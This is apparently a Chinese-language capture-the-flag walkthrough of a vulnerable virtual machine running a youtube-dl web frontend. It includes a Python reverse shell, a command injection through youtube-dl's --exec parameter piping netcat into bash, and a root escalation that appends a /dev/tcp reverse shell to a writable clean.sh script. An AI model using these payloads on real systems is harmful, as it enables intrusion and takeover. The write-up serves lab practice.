virtualbox + kali 2019.02
1、发现靶机
arp-scan -l
2、nmap扫面靶机,查看端口信息等:
3、开启了22和80端口,浏览网站:
4、开启burpsuite拦截请求数据包,修改数据包中的yt_url参数,查看响应消息,得到很多信息。
Action to repeater
5、在参数中输入--version,看一下,使用的youtube-dl是什么版本,返回是2020.03.24,版本比较新,查看自己kali机中的版本是2020.05.08
6、找个可以反弹shell的语句,编辑成hell.sh文件,开启两个nc,
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.168.10.37",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
7、使用youtube-dl的--exec参数,在burp中输入语句--exec`nc${IFS}172.168.10.37${IFS}5555${IFS}|${IFS}bash`
返回shell:
看到一个flag:
打开tmp下的clean.sh文件看看,
现在还不是root权限,进行提权操作,在shell中输入下面的句子,同时再开启一个nc监听,还是4322端口(其实应该是4321端口,刚刚误操作中断了nc所以就换了一个端口),随时查看nc这边的反应,当尝试运行clean.sh脚本时,显示没有权限,但是运行后,nc就返回信息了,root权限。
echo bash -c 'bash -i >& /dev/tcp/172.168.10.37/4322 0>&1' >> clean.sh
查看python相关信息
locate python
可以看到靶机中安装了python3:
还是使用python来获得一个稳定的shell,python3 -c 'import pty;pty.spawn("/bin/bash")'
于是在root下看到了root.txt的flag,至此,获取root的权限,并找到两个flag。
